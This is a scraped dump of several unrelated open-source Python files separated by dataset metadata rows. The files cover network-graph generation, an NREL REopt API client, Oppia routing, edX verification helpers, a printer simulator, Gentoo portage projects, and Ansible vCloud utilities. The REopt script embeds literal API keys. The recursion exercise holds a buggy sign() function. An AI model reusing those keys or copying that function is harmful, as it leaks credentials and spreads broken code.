return [None]
| gpl-3.0 | -4,262,551,166,050,060,300 | 30.834225 | 97 | 0.592642 | false |
hsnlab/mapping | generator/sg_generator.py | 1 | 5884 | #!/usr/bin/python -u
#
# Copyright (c) 2016 Balazs Nemeth
#
# This file is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
Generates requests that which can be used as standard test SG-s to cover
most/all functionalities of ESCAPE.
"""
import random
import string
from generator import NFFG
class NameGenerator(object):
def __init__ (self):
self.prefixes = {}
def _get_gen_for_name (self, prefix):
number = 0
while True:
yield prefix + str(number)
number += 1
def get_name (self, prefix):
if prefix in self.prefixes:
return self.prefixes[prefix].next()
else:
self.prefixes[prefix] = self._get_gen_for_name(prefix)
return self.prefixes[prefix].next()
def reset_name (self, prefix):
if prefix in self.prefixes:
del self.prefixes[prefix]
def get_8loop_request (abc_nf_types_len=10, seed=0, eightloops=1):
"""
Generates simple request NFFGs in all combinations of sap1-->vnf1-->...-->
vnfn-->sap1. Creates the requests for augmented-dfn-gwin.nffg
:param abc_nf_types_len: list of VNF **Types** which should be instantiated
:type abc_nf_types_len: list
:param seed: seed for random generator
:type seed: int
:param eightloops: the number of eight loops
:type eightloops: int
:return: an 8loop NFFG
:rtype: :any:`NFFG`
"""
saps = []
for i in xrange(0, 20):
saps.append("sap" + str(i))
rnd = random.Random()
rnd.seed(seed)
gen = NameGenerator()
nffg = NFFG(id="8loops-req")
nffg.mode = NFFG.MODE_ADD
nf_types = list(string.ascii_uppercase)[:abc_nf_types_len]
i = 1
for j in xrange(0, eightloops):
sap = rnd.choice(saps)
if sap not in nffg:
sapo = nffg.add_sap(id=sap, name=sap + "_name")
else:
sapo = nffg.network.node[sap]
if len(sapo.ports) > 0:
for sapp in sapo.ports:
break
else:
sapp = sapo.add_port(id=gen.get_name("port"))
vnfs1 = rnd.sample(nf_types, rnd.randint(1, len(nf_types)))
vnfs2 = rnd.sample(nf_types, rnd.randint(1, len(nf_types)))
nfmiddle = nffg.add_nf(id="nf0" + str(j), name="nf_middle" + str(j),
func_type=rnd.choice(vnfs1),
cpu=1, mem=1, storage=1)
try:
vnfs1.remove(nfmiddle.functional_type)
except ValueError:
pass
try:
vnfs2.remove(nfmiddle.functional_type)
except ValueError:
pass
once = True
for vnf_list in (vnfs1, vnfs2):
nf0 = nfmiddle
for vnf in vnf_list:
nf1 = nffg.add_nf(id="-".join(("nf", str(j), str(i))),
name="nf" + str(i) + "_" + vnf, func_type=vnf,
cpu=1, mem=1, storage=1)
nffg.add_sglink(src_port=nf0.add_port(id=gen.get_name("port")),
dst_port=nf1.add_port(id=gen.get_name("port")),
flowclass="HTTP", id=i)
nf0 = nf1
i += 1
if once:
nffg.add_sglink(src_port=nf0.add_port(id=gen.get_name("port")),
dst_port=nfmiddle.add_port(id=gen.get_name("port")),
flowclass="HTTP", id=i)
once = False
i += 1
nffg.add_sglink(src_port=nf1.add_port(id=gen.get_name("port")),
dst_port=sapp,
flowclass="HTTP", id=i)
nffg.add_sglink(src_port=sapp,
dst_port=nfmiddle.add_port(id=gen.get_name("port")),
flowclass="HTTP", id=i + 1)
i += 2
return nffg
def get_balanced_tree (r=2, h=3, seed=0, max_cpu=4, max_mem=1600,
max_storage=3, max_link_bw=5, min_link_delay=2,
abc_nf_types_len=10, max_link_delay=4):
"""
Gets a balanced tree which has SAPs in the root and the leaves, directed
from the root to the leaves.
:param r: branching factor of the tree
:param h: height of the tree
:return: NFFG
"""
nf_types = list(string.ascii_uppercase)[:abc_nf_types_len]
nffg = NFFG(id="req-tree-branching-" + str(r) + "-height-" + str(h))
nffg.mode = NFFG.MODE_ADD
rnd = random.Random()
rnd.seed(seed)
gen = NameGenerator()
sap_obj = nffg.add_sap(id=gen.get_name("sap"))
prev_level_nf_ports = [sap_obj.add_port(id=gen.get_name("port"))]
for level in xrange(0, h):
curr_level_nf_ports = []
for prev_level_port in prev_level_nf_ports:
for j in xrange(0, r):
nf = nffg.add_nf(id=gen.get_name("nf"), func_type=rnd.choice(nf_types),
cpu=rnd.random() * max_cpu,
mem=rnd.random() * max_mem,
storage=rnd.random() * max_storage)
nffg.add_sglink(prev_level_port, nf.add_port(gen.get_name("port")),
id=gen.get_name("sghop"))
curr_level_nf_ports.append(nf.add_port(gen.get_name("port")))
prev_level_nf_ports = curr_level_nf_ports
for port in prev_level_nf_ports:
sap = nffg.add_sap(id=gen.get_name("sap"))
nffg.add_sglink(port, sap.add_port(id=gen.get_name("port")),
id=gen.get_name("delay_sghop"),
delay=rnd.uniform(min_link_delay, max_link_delay),
bandwidth=rnd.random() * max_link_bw)
return nffg
if __name__ == '__main__':
# nffg = get_8loop_request(eightloops=3)
nffg = get_balanced_tree(r=2, h=2)
print nffg.dump()
| apache-2.0 | -6,003,011,394,337,642,000 | 32.816092 | 79 | 0.599422 | false |
dpinney/omf | omf/solvers/REopt/post_and_poll.py | 1 | 1120 | import requests
import json
from logger import log
from results_poller import poller
results_file = 'results.json'
API_KEY = 'WhEzm6QQQrks1hcsdN0Vrd56ZJmUyXJxTJFg6pn9' # REPLACE WITH YOUR API KEY
# API_KEY = 'Y8GMAFsqcPtxhjIa1qfNj5ILxN5DH5cjV3i6BeNE'
root_url = 'https://developer.nrel.gov/api/reopt'
post_url = root_url + '/v1/job/?api_key=' + API_KEY
results_url = root_url + '/v1/job/<run_uuid>/results/?api_key=' + API_KEY
post = json.load(open('Scenario_test_POST.json'))
resp = requests.post(post_url, json=post)
if not resp.ok:
log.error("Status code {}. {}".format(resp.status_code, resp.content))
else:
log.info("Response OK from {}.".format(post_url))
run_id_dict = json.loads(resp.text)
try:
run_id = run_id_dict['run_uuid']
except KeyError:
msg = "Response from {} did not contain run_uuid.".format(post_url)
log.error(msg)
raise KeyError(msg)
results = poller(url=results_url.replace('<run_uuid>', run_id))
with open(results_file, 'w') as fp:
json.dump(obj=results, fp=fp)
log.info("Saved results to {}".format(results_file))
| gpl-2.0 | -2,044,019,572,903,973,600 | 31 | 81 | 0.674107 | false |
MaximLich/oppia | main_taskqueue.py | 11 | 1803 | # Copyright 2016 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main package for URL routing for requests originating from the task queue."""
# pylint: disable=relative-import
from core.controllers import tasks
from core.platform import models
import feconf
import main
# pylint: enable=relative-import
import webapp2
transaction_services = models.Registry.import_transaction_services()
# Register the URLs with the classes responsible for handling them.
URLS = [
main.get_redirect_route(
r'%s' % feconf.TASK_URL_FEEDBACK_MESSAGE_EMAILS,
tasks.UnsentFeedbackEmailHandler),
main.get_redirect_route(
r'%s' % feconf.TASK_URL_SUGGESTION_EMAILS,
tasks.SuggestionEmailHandler),
main.get_redirect_route(
r'%s' % feconf.TASK_URL_FLAG_EXPLORATION_EMAILS,
tasks.FlagExplorationEmailHandler),
main.get_redirect_route(
r'%s' % feconf.TASK_URL_INSTANT_FEEDBACK_EMAILS,
tasks.InstantFeedbackMessageEmailHandler),
main.get_redirect_route(
r'%s' % feconf.TASK_URL_FEEDBACK_STATUS_EMAILS,
tasks.FeedbackThreadStatusChangeEmailHandler),
]
app = transaction_services.toplevel_wrapper( # pylint: disable=invalid-name
webapp2.WSGIApplication(URLS, debug=feconf.DEBUG))
| apache-2.0 | 6,589,000,064,213,346,000 | 35.795918 | 80 | 0.740433 | false |
CptDemocracy/Python | MITx-6.00.1x-EDX-Introduction-to-Computer-Science/Week-3/Lecture-5/problem3.py | 1 | 1417 | """
Problem 3.
The function recurPower(base, exp) from Problem 2 computed base^exp
by decomposing the problem into one recursive case and one base case:
base^exp = base * base^(exp - 1) if exp > 0
base^exp = 1 if exp = 0
Another way to solve this problem just using multiplication
(and remainder) is to note that:
base^exp = (base^2)^(exp/2) if exp > 0 and exp is even
base^exp = base * base^(exp - 1) if exp > 0 and exp is odd
base^exp = 1 if exp = 0
Write a procedure recurPowerNew which recursively computes
exponentials using this idea.
"""
def sign(n):
if sign > 0:
return 1
elif sign < 0:
return -1
else:
return 0
def recurPowerNew(base, exp):
'''
base: int or float.
exp: int >= 0
returns: int or float; base^exp
'''
if exp == 0:
return 1.0
if exp == 1:
return base
expSign = sign(exp)
if abs(exp) > 1:
if abs(exp) % 2 == 0:
if expSign > 0:
return recurPowerNew(base * base, abs(exp) / 2.0)
else:
return 1.0 / (recurPowerNew(base * base, abs(exp) / 2.0))
elif abs(exp) % 2 == 1:
if expSign > 0:
return base * recurPowerNew(base, abs(exp) - 1)
else:
return 1.0 / (base * recurPowerNew(base, abs(exp) - 1))
return -1.0
| mit | -3,404,950,140,497,356,000 | 26.25 | 73 | 0.539873 | false |
martynovp/edx-platform | common/djangoapps/student/helpers.py | 2 | 10810 | """Helpers for the student app. """
import time
from datetime import datetime
import urllib
from pytz import UTC
from django.utils.http import cookie_date
from django.conf import settings
from django.core.urlresolvers import reverse, NoReverseMatch
import third_party_auth
from verify_student.models import SoftwareSecurePhotoVerification # pylint: disable=F0401
from course_modes.models import CourseMode
# Enumeration of per-course verification statuses
# we display on the student dashboard.
VERIFY_STATUS_NEED_TO_VERIFY = "verify_need_to_verify"
VERIFY_STATUS_SUBMITTED = "verify_submitted"
VERIFY_STATUS_APPROVED = "verify_approved"
VERIFY_STATUS_MISSED_DEADLINE = "verify_missed_deadline"
VERIFY_STATUS_NEED_TO_REVERIFY = "verify_need_to_reverify"
def check_verify_status_by_course(user, course_enrollments, all_course_modes):
"""
Determine the per-course verification statuses for a given user.
The possible statuses are:
* VERIFY_STATUS_NEED_TO_VERIFY: The student has not yet submitted photos for verification.
* VERIFY_STATUS_SUBMITTED: The student has submitted photos for verification,
but has have not yet been approved.
* VERIFY_STATUS_APPROVED: The student has been successfully verified.
* VERIFY_STATUS_MISSED_DEADLINE: The student did not submit photos within the course's deadline.
* VERIFY_STATUS_NEED_TO_REVERIFY: The student has an active verification, but it is
set to expire before the verification deadline for the course.
It is is also possible that a course does NOT have a verification status if:
* The user is not enrolled in a verified mode, meaning that the user didn't pay.
* The course does not offer a verified mode.
* The user submitted photos but an error occurred while verifying them.
* The user submitted photos but the verification was denied.
In the last two cases, we rely on messages in the sidebar rather than displaying
messages for each course.
Arguments:
user (User): The currently logged-in user.
course_enrollments (list[CourseEnrollment]): The courses the user is enrolled in.
all_course_modes (list): List of all course modes for the student's enrolled courses,
including modes that have expired.
Returns:
dict: Mapping of course keys verification status dictionaries.
If no verification status is applicable to a course, it will not
be included in the dictionary.
The dictionaries have these keys:
* status (str): One of the enumerated status codes.
* days_until_deadline (int): Number of days until the verification deadline.
* verification_good_until (str): Date string for the verification expiration date.
"""
status_by_course = {}
# Retrieve all verifications for the user, sorted in descending
# order by submission datetime
verifications = SoftwareSecurePhotoVerification.objects.filter(user=user)
# Check whether the user has an active or pending verification attempt
# To avoid another database hit, we re-use the queryset we have already retrieved.
has_active_or_pending = SoftwareSecurePhotoVerification.user_has_valid_or_pending(
user, queryset=verifications
)
recent_verification_datetime = None
for enrollment in course_enrollments:
# Get the verified mode (if any) for this course
# We pass in the course modes we have already loaded to avoid
# another database hit, as well as to ensure that expired
# course modes are included in the search.
verified_mode = CourseMode.verified_mode_for_course(
enrollment.course_id,
modes=all_course_modes[enrollment.course_id]
)
# If no verified mode has ever been offered, or the user hasn't enrolled
# as verified, then the course won't display state related to its
# verification status.
if verified_mode is not None and enrollment.mode in CourseMode.VERIFIED_MODES:
deadline = verified_mode.expiration_datetime
relevant_verification = SoftwareSecurePhotoVerification.verification_for_datetime(deadline, verifications)
# Picking the max verification datetime on each iteration only with approved status
if relevant_verification is not None and relevant_verification.status == "approved":
recent_verification_datetime = max(
recent_verification_datetime if recent_verification_datetime is not None
else relevant_verification.expiration_datetime,
relevant_verification.expiration_datetime
)
# By default, don't show any status related to verification
status = None
# Check whether the user was approved or is awaiting approval
if relevant_verification is not None:
if relevant_verification.status == "approved":
status = VERIFY_STATUS_APPROVED
elif relevant_verification.status == "submitted":
status = VERIFY_STATUS_SUBMITTED
# If the user didn't submit at all, then tell them they need to verify
# If the deadline has already passed, then tell them they missed it.
# If they submitted but something went wrong (error or denied),
# then don't show any messaging next to the course, since we already
# show messages related to this on the left sidebar.
submitted = (
relevant_verification is not None and
relevant_verification.status not in ["created", "ready"]
)
if status is None and not submitted:
if deadline is None or deadline > datetime.now(UTC):
if has_active_or_pending:
# The user has an active verification, but the verification
# is set to expire before the deadline. Tell the student
# to reverify.
status = VERIFY_STATUS_NEED_TO_REVERIFY
else:
status = VERIFY_STATUS_NEED_TO_VERIFY
else:
# If a user currently has an active or pending verification,
# then they may have submitted an additional attempt after
# the verification deadline passed. This can occur,
# for example, when the support team asks a student
# to reverify after the deadline so they can receive
# a verified certificate.
# In this case, we still want to show them as "verified"
# on the dashboard.
if has_active_or_pending:
status = VERIFY_STATUS_APPROVED
# Otherwise, the student missed the deadline, so show
# them as "honor" (the kind of certificate they will receive).
else:
status = VERIFY_STATUS_MISSED_DEADLINE
# Set the status for the course only if we're displaying some kind of message
# Otherwise, leave the course out of the dictionary.
if status is not None:
days_until_deadline = None
now = datetime.now(UTC)
if deadline is not None and deadline > now:
days_until_deadline = (deadline - now).days
status_by_course[enrollment.course_id] = {
'status': status,
'days_until_deadline': days_until_deadline
}
if recent_verification_datetime:
for key, value in status_by_course.iteritems(): # pylint: disable=unused-variable
status_by_course[key]['verification_good_until'] = recent_verification_datetime.strftime("%m/%d/%Y")
return status_by_course
def auth_pipeline_urls(auth_entry, redirect_url=None):
"""Retrieve URLs for each enabled third-party auth provider.
These URLs are used on the "sign up" and "sign in" buttons
on the login/registration forms to allow users to begin
authentication with a third-party provider.
Optionally, we can redirect the user to an arbitrary
url after auth completes successfully. We use this
to redirect the user to a page that required login,
or to send users to the payment flow when enrolling
in a course.
Args:
auth_entry (string): Either `pipeline.AUTH_ENTRY_LOGIN` or `pipeline.AUTH_ENTRY_REGISTER`
Keyword Args:
redirect_url (unicode): If provided, send users to this URL
after they successfully authenticate.
Returns:
dict mapping provider IDs to URLs
"""
if not third_party_auth.is_enabled():
return {}
return {
provider.provider_id: third_party_auth.pipeline.get_login_url(
provider.provider_id, auth_entry, redirect_url=redirect_url
) for provider in third_party_auth.provider.Registry.enabled()
}
# Query string parameters that can be passed to the "finish_auth" view to manage
# things like auto-enrollment.
POST_AUTH_PARAMS = ('course_id', 'enrollment_action', 'course_mode', 'email_opt_in')
def get_next_url_for_login_page(request):
"""
Determine the URL to redirect to following login/registration/third_party_auth
The user is currently on a login or reigration page.
If 'course_id' is set, or other POST_AUTH_PARAMS, we will need to send the user to the
/account/finish_auth/ view following login, which will take care of auto-enrollment in
the specified course.
Otherwise, we go to the ?next= query param or to the dashboard if nothing else is
specified.
"""
redirect_to = request.GET.get('next', None)
if not redirect_to:
try:
redirect_to = reverse('dashboard')
except NoReverseMatch:
redirect_to = reverse('home')
if any(param in request.GET for param in POST_AUTH_PARAMS):
# Before we redirect to next/dashboard, we need to handle auto-enrollment:
params = [(param, request.GET[param]) for param in POST_AUTH_PARAMS if param in request.GET]
params.append(('next', redirect_to)) # After auto-enrollment, user will be sent to payment page or to this URL
redirect_to = '{}?{}'.format(reverse('finish_auth'), urllib.urlencode(params))
# Note: if we are resuming a third party auth pipeline, then the next URL will already
# be saved in the session as part of the pipeline state. That URL will take priority
# over this one.
return redirect_to
| agpl-3.0 | 7,328,953,190,709,362,000 | 44.805085 | 119 | 0.654209 | false |
CartesianCo/argentum-control | src/simcon.py | 2 | 1786 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Argentum Control GUI
Copyright (C) 2013 Isabella Stevens
Copyright (C) 2014 Michael Shiel
Copyright (C) 2015 Trent Waddington
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from controllers import ParsingControllerBase
from CartesianCo import ArgentumEmulator
class SimulatorController(ParsingControllerBase):
def __init__(self):
self.printer = ArgentumEmulator(None, None)
def incrementalMovementCommand(self, axis, steps):
print(self.printer.currentPosition)
#print('incrementalMovementCommand on {} axis for {} steps.'.format(axis, steps))
if axis == 'X':
if steps == 0:
self.printer.moveToX(0)
else:
self.printer.incrementX(xIncrement=steps)
if axis == 'Y':
if steps == 0:
self.printer.moveToY(0)
else:
self.printer.incrementY(yIncrement=steps)
def firingCommand(self, primitives1, address1, primitives2, address2):
print('firingCommand on primitives {}-{} and address {}.'.format(primitives1, primitives2, address1))
pass
| gpl-3.0 | 6,288,955,210,944,737,000 | 35.44898 | 109 | 0.671333 | false |
simbuerg/benchbuild | benchbuild/projects/gentoo/portage_gen.py | 1 | 4310 | """
Generic experiment to test portage packages within gentoo chroot.
"""
import logging
import os
from benchbuild.projects.gentoo import autoportage
from benchbuild.utils.run import run, uchroot_no_args
from benchbuild.utils.container import Gentoo
from plumbum import local, ProcessExecutionError
def PortageFactory(name, NAME, DOMAIN, BaseClass=autoportage.AutoPortage):
"""
Create a new dynamic portage project.
Auto-Generated projects can only be used for compilie-time experiments,
because there simply is no run-time test defined for it. Therefore,
we implement the run symbol as a noop (with minor logging).
This way we avoid the default implementation for run() that all projects
inherit.
Args:
name: Name of the dynamic class.
NAME: NAME property of the dynamic class.
DOMAIN: DOMAIN property of the dynamic class.
BaseClass: Base class to use for the dynamic class.
Returns:
A new class with NAME,DOMAIN properties set, unable to perform
run-time tests.
Examples:
>>> from benchbuild.projects.gentoo.portage_gen import PortageFactory
>>> from benchbuild.experiments.empty import Empty
>>> c = PortageFactory("test", "NAME", "DOMAIN")
>>> c
<class '__main__.test'>
>>> i = c(Empty())
>>> i.NAME
'NAME'
>>> i.DOMAIN
'DOMAIN'
"""
#pylint: disable=too-few-public-methods
class FuncClass(object):
"""
Finds out the current version number of a gentoo package.
The package name is created by combining the domain and the name.
Then uchroot is used to switch into a gentoo shell where the 'emerge'
command is used to recieve the version number.
The function then parses the version number back into the file.
Args:
Name: Name of the project.
Domain: Categorie of the package.
"""
def __init__(self, name, domain, container):
self.name = name
self.domain = domain
self.container = container
def __repr__(self):
return self.__str__()
def __str__(self):
try:
domain, _, name = self.name.partition("_")
package = domain + '/' + name
container = self.container()
uchroot = uchroot_no_args()
uchroot = uchroot["-E", "-A", "-C", "-w", "/", "-r"]
uchroot = uchroot[container.local]
with local.env(CONFIG_PROTECT="-*"):
fake_emerge = uchroot["emerge",
"--autounmask-only=y",
"--autounmask-write=y",
"--nodeps"]
run(fake_emerge[package])
emerge_in_chroot = uchroot["emerge",
"-p",
"--nodeps",
package]
_, stdout, _ = emerge_in_chroot.run()
for line in stdout.split('\n'):
if package in line:
_, _, package_name = line.partition("/")
_, name, version = package_name.partition(name)
version, _, _ = version.partition(" ")
return version[1:]
except ProcessExecutionError:
logger = logging.getLogger(__name__)
logger.info("This older package might not exist any more.")
return "Default"
def run_not_supported(self, *args, **kwargs): # pylint: disable=W0613
"""Dynamic projects don't support a run() test."""
from benchbuild.settings import CFG
logger = logging.getLogger(__name__)
logger.info("run() not supported.")
if CFG["clean"].value():
self.clean()
return
newclass = type(name, (BaseClass,), {
"NAME": NAME,
"DOMAIN": DOMAIN,
"SRC_FILE": "none",
"VERSION": FuncClass(NAME, DOMAIN, Gentoo),
"GROUP": "auto-gentoo",
"run": run_not_supported,
"__module__": "__main__"
})
return newclass
| mit | 8,436,380,484,041,424,000 | 34.619835 | 77 | 0.535731 | false |
victorlin/ansible-docker-hellobaby | setup.py | 1 | 1061 | import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.txt')) as f:
README = f.read()
with open(os.path.join(here, 'CHANGES.txt')) as f:
CHANGES = f.read()
requires = [
'pyramid',
'pyramid_chameleon',
'pyramid_debugtoolbar',
'waitress',
]
setup(name='hellobaby',
version='0.0',
description='hellobaby',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='',
author_email='',
url='',
keywords='web pyramid pylons',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=requires,
tests_require=requires,
test_suite="hellobaby",
entry_points="""\
[paste.app_factory]
main = hellobaby:main
""",
)
| mit | 3,099,108,538,728,659,000 | 24.261905 | 63 | 0.579642 | false |
HyperBaton/ansible | lib/ansible/module_utils/vca.py | 38 | 11383 | #
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import os
import traceback
PYVCLOUD_IMP_ERR = None
try:
from pyvcloud.vcloudair import VCA
HAS_PYVCLOUD = True
except ImportError:
PYVCLOUD_IMP_ERR = traceback.format_exc()
HAS_PYVCLOUD = False
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
SERVICE_MAP = {'vca': 'ondemand', 'vchs': 'subscription', 'vcd': 'vcd'}
LOGIN_HOST = {'vca': 'vca.vmware.com', 'vchs': 'vchs.vmware.com'}
DEFAULT_SERVICE_TYPE = 'vca'
DEFAULT_VERSION = '5.7'
class VcaError(Exception):
def __init__(self, msg, **kwargs):
self.kwargs = kwargs
super(VcaError, self).__init__(msg)
def vca_argument_spec():
return dict(
username=dict(type='str', aliases=['user'], required=True),
password=dict(type='str', aliases=['pass', 'passwd'], required=True, no_log=True),
org=dict(),
service_id=dict(),
instance_id=dict(),
host=dict(),
api_version=dict(default=DEFAULT_VERSION),
service_type=dict(default=DEFAULT_SERVICE_TYPE, choices=SERVICE_MAP.keys()),
vdc_name=dict(),
gateway_name=dict(default='gateway'),
validate_certs=dict(type='bool', default=True, aliases=['verify_certs'])
)
class VcaAnsibleModule(AnsibleModule):
def __init__(self, *args, **kwargs):
argument_spec = vca_argument_spec()
argument_spec.update(kwargs.get('argument_spec', dict()))
kwargs['argument_spec'] = argument_spec
super(VcaAnsibleModule, self).__init__(*args, **kwargs)
if not HAS_PYVCLOUD:
self.fail(missing_required_lib('pyvcloud'),
exception=PYVCLOUD_IMP_ERR)
self._vca = self.create_instance()
self.login()
self._gateway = None
self._vdc = None
@property
def vca(self):
return self._vca
@property
def gateway(self):
if self._gateway is not None:
return self._gateway
vdc_name = self.params['vdc_name']
gateway_name = self.params['gateway_name']
_gateway = self.vca.get_gateway(vdc_name, gateway_name)
if not _gateway:
raise VcaError('vca instance has no gateway named %s' % gateway_name)
self._gateway = _gateway
return _gateway
@property
def vdc(self):
if self._vdc is not None:
return self._vdc
vdc_name = self.params['vdc_name']
_vdc = self.vca.get_vdc(vdc_name)
if not _vdc:
raise VcaError('vca instance has no vdc named %s' % vdc_name)
self._vdc = _vdc
return _vdc
def get_vapp(self, vapp_name):
vapp = self.vca.get_vapp(self.vdc, vapp_name)
if not vapp:
raise VcaError('vca instance has no vapp named %s' % vapp_name)
return vapp
def get_vm(self, vapp_name, vm_name):
vapp = self.get_vapp(vapp_name)
children = vapp.me.get_Children()
vms = [vm for vm in children.get_Vm() if vm.name == vm_name]
try:
return vms[0]
except IndexError:
raise VcaError('vapp has no vm named %s' % vm_name)
def create_instance(self):
service_type = self.params.get('service_type', DEFAULT_SERVICE_TYPE)
if service_type == 'vcd':
host = self.params['host']
else:
host = LOGIN_HOST[service_type]
username = self.params['username']
version = self.params.get('api_version')
if service_type == 'vchs':
version = '5.6'
verify = self.params.get('validate_certs')
return VCA(host=host, username=username,
service_type=SERVICE_MAP[service_type],
version=version, verify=verify)
def login(self):
service_type = self.params['service_type']
password = self.params['password']
login_org = None
if service_type == 'vcd':
login_org = self.params['org']
if not self.vca.login(password=password, org=login_org):
self.fail('Login to VCA failed', response=self.vca.response.content)
try:
method_name = 'login_%s' % service_type
meth = getattr(self, method_name)
meth()
except AttributeError:
self.fail('no login method exists for service_type %s' % service_type)
except VcaError as e:
self.fail(e.message, response=self.vca.response.content, **e.kwargs)
def login_vca(self):
instance_id = self.params['instance_id']
if not instance_id:
raise VcaError('missing required instance_id for service_type vca')
self.vca.login_to_instance_sso(instance=instance_id)
def login_vchs(self):
service_id = self.params['service_id']
if not service_id:
raise VcaError('missing required service_id for service_type vchs')
org = self.params['org']
if not org:
raise VcaError('missing required org for service_type vchs')
self.vca.login_to_org(service_id, org)
def login_vcd(self):
org = self.params['org']
if not org:
raise VcaError('missing required org for service_type vcd')
if not self.vca.token:
raise VcaError('unable to get token for service_type vcd')
if not self.vca.vcloud_session.org_url:
raise VcaError('unable to get org_url for service_type vcd')
self.vca.login(token=self.vca.token, org=org,
org_url=self.vca.vcloud_session.org_url)
def save_services_config(self, blocking=True):
task = self.gateway.save_services_configuration()
if not task:
self.fail(msg='unable to save gateway services configuration')
if blocking:
self.vca.block_until_completed(task)
def fail(self, msg, **kwargs):
self.fail_json(msg=msg, **kwargs)
def exit(self, **kwargs):
self.exit_json(**kwargs)
# -------------------------------------------------------------
# 9/18/2015 @privateip
# All of the functions below here were migrated from the original
# vca_* modules. All functions below should be considered deprecated
# and will be removed once all of the vca_* modules have been updated
# to use the new instance module above
# -------------------------------------------------------------
VCA_REQ_ARGS = ['instance_id', 'vdc_name']
VCHS_REQ_ARGS = ['service_id']
VCD_REQ_ARGS = []
def _validate_module(module):
if not HAS_PYVCLOUD:
module.fail_json(msg=missing_required_lib("pyvcloud"),
exception=PYVCLOUD_IMP_ERR)
service_type = module.params.get('service_type', DEFAULT_SERVICE_TYPE)
if service_type == 'vca':
for arg in VCA_REQ_ARGS:
if module.params.get(arg) is None:
module.fail_json(msg="argument %s is mandatory when service type "
"is vca" % arg)
if service_type == 'vchs':
for arg in VCHS_REQ_ARGS:
if module.params.get(arg) is None:
module.fail_json(msg="argument %s is mandatory when service type "
"is vchs" % arg)
if service_type == 'vcd':
for arg in VCD_REQ_ARGS:
if module.params.get(arg) is None:
module.fail_json(msg="argument %s is mandatory when service type "
"is vcd" % arg)
def serialize_instances(instance_list):
instances = []
for i in instance_list:
instances.append(dict(apiUrl=i['apiUrl'], instance_id=i['id']))
return instances
def _vca_login(vca, password, instance):
if not vca.login(password=password):
raise VcaError("Login Failed: Please check username or password",
error=vca.response.content)
if not vca.login_to_instance_sso(instance=instance):
s_json = serialize_instances(vca.instances)
raise VcaError("Login to Instance failed: Seems like instance_id provided "
"is wrong .. Please check", valid_instances=s_json)
return vca
def _vchs_login(vca, password, service, org):
if not vca.login(password=password):
raise VcaError("Login Failed: Please check username or password",
error=vca.response.content)
if not vca.login_to_org(service, org):
raise VcaError("Failed to login to org, Please check the orgname",
error=vca.response.content)
def _vcd_login(vca, password, org):
# TODO: this function needs to be refactored
if not vca.login(password=password, org=org):
raise VcaError("Login Failed: Please check username or password "
"or host parameters")
if not vca.login(password=password, org=org):
raise VcaError("Failed to get the token",
error=vca.response.content)
if not vca.login(token=vca.token, org=org, org_url=vca.vcloud_session.org_url):
raise VcaError("Failed to login to org", error=vca.response.content)
def vca_login(module):
service_type = module.params.get('service_type')
username = module.params.get('username')
password = module.params.get('password')
instance = module.params.get('instance_id')
org = module.params.get('org')
vdc_name = module.params.get('vdc_name')
service = module.params.get('service_id')
version = module.params.get('api_version')
verify = module.params.get('validate_certs')
_validate_module(module)
if not vdc_name and service_type == 'vchs':
vdc_name = module.params.get('service_id')
if not org and service_type == 'vchs':
org = vdc_name or service
if service_type == 'vcd':
host = module.params.get('host')
else:
host = LOGIN_HOST[service_type]
username = os.environ.get('VCA_USER', username)
password = os.environ.get('VCA_PASS', password)
if not username or not password:
msg = "Either the username or password is not set, please check args"
module.fail_json(msg=msg)
if service_type == 'vchs':
version = '5.6'
elif service_type == 'vcd' and not version:
version = '5.6'
vca = VCA(host=host, username=username,
service_type=SERVICE_MAP[service_type],
version=version, verify=verify)
try:
if service_type == 'vca':
_vca_login(vca, password, instance)
elif service_type == 'vchs':
_vchs_login(vca, password, service, org)
elif service_type == 'vcd':
_vcd_login(vca, password, org)
except VcaError as e:
module.fail_json(msg=e.message, **e.kwargs)
return vca
| gpl-3.0 | 7,062,952,371,725,994,000 | 32.777448 | 90 | 0.604498 | false |
rosskynch/complex_bessel | tests/hankelcontours.py | 2 | 1310 | # Python script to generate the contour plot
# seen in Abramowitz & Stegun's book on p. 359.
# The values are imported from the file "contours.dat"
#
# The pylab module is required for this script to run
#
# Joey Dumont <[email protected]>
# Denis Gagnon <[email protected]>
#
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams['text.usetex'] = True
plt.rcParams['font.size'] = 10
plt.rcParams['legend.numpoints'] = 3
